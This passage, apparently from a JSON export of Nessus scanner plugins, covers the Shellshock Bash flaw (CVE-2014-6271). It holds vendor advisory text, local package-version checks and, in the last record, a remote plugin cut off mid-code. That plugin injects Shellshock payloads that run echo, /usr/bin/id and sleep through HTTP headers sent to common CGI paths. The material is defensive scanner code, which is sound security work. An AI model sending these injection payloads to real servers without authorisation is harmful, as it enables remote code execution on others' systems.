Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this issue.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2014-1293.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77848", "published": "2014-09-25T00:00:00", "title": "Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1293) (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1293 and \n# Oracle Linux Security Advisory ELSA-2014-1293 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77848);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/07/18 17:43:57\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"RHSA\", value:\"2014:1293\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1293) (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:1293 :\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to the\nKnowledgebase article at https://access.redhat.com/articles/1200223\n\nRed Hat would like to thank Stephane Chazelas for reporting this\nissue.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004470.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004471.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004472.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:27", "bulletinFamily": "scanner", "description": "A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to https://securityblog.redhat.com/2014/09/24/bash-specially crafted-environment-variables-code-injection-attack/", "modified": "2018-12-28T00:00:00", "id": "SL_20140924_BASH_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77865", "published": "2014-09-26T00:00:00", "title": "Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77865);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (Shellshock)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue.\n(CVE-2014-6271)\n\nFor additional information on the CVE-2014-6271 flaw, refer to\nhttps://securityblog.redhat.com/2014/09/24/bash-specially\ncrafted-environment-variables-code-injection-attack/\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=1727\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d4dfe3fd\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bash-3.2-33.el5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bash-debuginfo-3.2-33.el5.1\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-15.el6_5.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-15.el6_5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:27", "bulletinFamily": "scanner", "description": "bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in environment variables passed at startup time. This allowed code execution by local or remote attackers who could pass environment variables to bash scripts. (CVE-2014-6271)", "modified": "2016-12-21T00:00:00", "id": "SUSE_11_BASH-140919.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77850", "published": "2014-09-25T00:00:00", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9740)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77850);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2016/12/21 20:21:19 $\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9740)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"bash has been updated to fix a critical security issue.\n\nIn some circumstances, the shell would evaluate shellcode in\nenvironment variables passed at startup time. This allowed code\nexecution by local or remote attackers who could pass environment\nvariables to bash scripts. (CVE-2014-6271)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:22:26", "bulletinFamily": "scanner", "description": "The remote web server is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "modified": "2018-10-03T00:00:00", "id": "BASH_CVE_2014_6271_RCE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=77829", "published": "2014-09-24T00:00:00", "title": "GNU Bash Environment Variable Handling Code Injection (Shellshock)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77829);\n script_version(\"1.38\");\n script_cvs_date(\"Date: 2018/10/03 13:19:54\");\n\n script_cve_id(\"CVE-2014-6271\");\n script_bugtraq_id(70103);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"GNU Bash Environment Variable Handling Code Injection (Shellshock)\");\n script_summary(english:\"Attempts to run arbitrary code.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the referenced patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_timeout(900); # up to 15mn\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Do not use get_http_port() here\nport = get_kb_item(\"Services/www\");\nif (!port) port = 80;\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n# Do not test broken web servers\nbroken_web = get_kb_item(\"Services/www/\" + port + \"/broken\");\n\n# Do not test CIM servers as HTTP GET requests can lead to FP situations\nif (port == get_kb_item(\"Services/cim_listener\") || broken_web)\n exit(0, 'The web server on port ' +port+ ' is broken.');\n\ncgis = make_list('/');\n\ncgis1 = get_kb_list('www/'+port+'/cgi');\nif (!isnull(cgis1)) cgis = make_list(cgis, cgis1);\n\ncgidirs = get_kb_list('www/'+port+'/content/extensions/*');\nif (!isnull(cgidirs) && !thorough_tests)\n{\n foreach dir (cgidirs)\n {\n if (preg(pattern:'^/+cgi-bin', string:dir, icase:TRUE))\n cgis = make_list(dir, cgis);\n }\n}\n\n# Add common cgi scripts\ncgis = list_uniq(make_list(cgis,\n \"/_mt/mt.cgi\",\n \"/admin.cgi\",\n \"/administrator.cgi\",\n \"/buglist.cgi\",\n \"/cgi/mid.cgi\",\n \"/cgi-bin/admin\",\n \"/cgi-bin/admin.cgi\",\n \"/cgi-bin/admin.pl\",\n \"/cgi-bin/administrator\",\n \"/cgi-bin/administrator.cgi\",\n \"/cgi-bin/agorn.cgi\",\n \"/cgi-bin/bugreport.cgi\",\n \"/cgi-bin/cart.cgi\",\n \"/cgi-bin/clwarn.cgi\",\n \"/cgi-bin/count.cgi\",\n \"/cgi-bin/Count.cgi\",\n \"/cgi-bin/faqmanager.cgi\",\n \"/cgi-bin/FormHandler.cgi\",\n \"/cgi-bin/FormMail.cgi\",\n \"/cgi-bin/guestbook.cgi\",\n \"/cgi-bin/help.cgi\",\n \"/cgi-bin/hi\",\n \"/cgi-bin/index.cgi\",\n \"/cgi-bin/index.pl\",\n \"/cgi-bin/index.sh\",\n \"/cgi-bin/login.cgi\",\n \"/cgi-bin/mailit.pl\",\n \"/cgi-bin/mt/mt-check.cgi\",\n \"/cgi-bin/mt/mt-load.cgi\",\n \"/cgi-bin/mt-static/mt-check.cgi\",\n \"/cgi-bin/mt-static/mt-load.cgi\",\n \"/cgi-bin/ncbook/book.cgi\",\n \"/cgi-bin/printenv\",\n \"/cgi-bin/printenv.cgi\",\n \"/cgi-bin/quickstore.cgi\",\n \"/cgi-bin/search\",\n \"/cgi-bin/search.cgi\",\n \"/cgi-bin/search/search.cgi\",\n \"/cgi-bin/status\",\n \"/cgi-bin/status.cgi\",\n \"/cgi-bin/test.cgi\",\n \"/cgi-bin/test.sh\",\n \"/cgi-bin/test-cgi\",\n \"/cgi-bin/upload.cgi\",\n \"/cgi-bin/urlcount.cgi\",\n \"/cgi-bin/viewcvs.cgi\",\n \"/cgi-bin/wa\",\n \"/cgi-bin/wa.cgi\",\n \"/cgi-bin/wa.exe\",\n \"/cgi-bin/whois.cgi\",\n \"/cgi-bin-sdb/printenv\",\n \"/cgi-mod/index.cgi\",\n \"/cgi-sys/defaultwebpage.cgi\",\n \"/cgi-sys/entropysearch.cgi\",\n \"/index.cgi\",\n \"/index.pl\",\n \"/index.sh\",\n \"/nph-mr.cgi\",\n \"/query.cgi\",\n \"/session_login.cgi\",\n \"/show_bug.cgi\",\n \"/test\",\n \"/test.cgi\",\n \"/ucsm/isSamInstalled.cgi\",\n \"/whois.cgi\",\n \"/wp-login.php\",\n \"/wwwadmin.cgi\",\n \"/wwwboard.cgi\",\n \"/xampp/cgi.cgi\"));\n\nif (thorough_tests) exts = make_list(\"*\");\nelse exts = make_list(\"cgi\", \"php\", \"php5\", \"pl\", \"py\", \"rb\", \"sh\", \"java\", \"jsp\", \"action\", \"do\", \"shtml\");\n\nforeach ext (exts)\n{\n cgis2 = get_kb_list('www/'+port+'/content/extensions/'+ext);\n if (!isnull(cgis2)) cgis = list_uniq(make_list(cgis2, cgis));\n}\n\nif ( thorough_tests )\n headers = make_list('User-Agent', 'Referrer', 'Cookie');\nelse\n headers = make_list('User-Agent');\n\nscript = SCRIPT_NAME - \".nasl\";\nint1 = rand() % 100;\nint2 = rand() % 100;\n\n\n\nEXPLOIT_TYPE_WAIT = 0;\nEXPLOIT_TYPE_STDOUT = 1;\n\n\nexploits = make_list();\nn = 0;\n\nexploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_STDOUT,\n\t\"payload\", '() { ignored; }; echo Content-Type: text/plain ; echo ; echo \"' + script+' Output : $((' + int1 + '+'+int2+'))\"',\n \t\"pattern\", script + \" Output : \" + int(int1 + int2),\n\t\"followup\", \"() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id;\"\n\t);\nif (report_paranoia == 2)\n{\n exploits[n++] = make_array(\n\t\"type\",\tEXPLOIT_TYPE_WAIT,\n\t\"payload\", '() { ignored; }; /bin/sleep $WAITTIME;'\n\t);\n}\n\n\nvuln = FALSE;\nWaitTime = 5;\n\n\nforeach cgi (cgis)\n{\nforeach exploit ( exploits )\n{\n foreach header (headers)\n {\n then = unixtime();\n\n if ( exploit[\"type\"] == EXPLOIT_TYPE_WAIT && report_paranoia == 2 )\n {\n http_set_read_timeout(WaitTime * 2);\n payload = str_replace(find:\"$WAITTIME\", replace:string(WaitTime), string:exploit[\"payload\"]);\n }\n else payload = exploit[\"payload\"];\n\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : cgi,\n add_headers : make_array(header, payload),\n exit_on_fail : TRUE\n );\n\n now = unixtime();\n\n # Check that we added our two random numbers and get our expected output\n # ie : int1 = 40, int2 = 65 output should be the following :\n # bash_cve_2014_6271_rce Output : 105\n if (exploit[\"type\"] == EXPLOIT_TYPE_STDOUT && exploit[\"pattern\"] >< res[2])\n {\n vuln = TRUE;\n attack_req = http_last_sent_request();\n\n match = pregmatch(pattern:\"(\"+exploit[\"pattern\"]+\")\", string:res[2]);\n if (isnull(match) || empty_or_null(match[1])) output = chomp(res[2]);\n else output = match[1];\n\n # Try and run id if our above request was a success\n res2 = http_send_recv3(\n method : \"GET\",\n port : port,\n item : 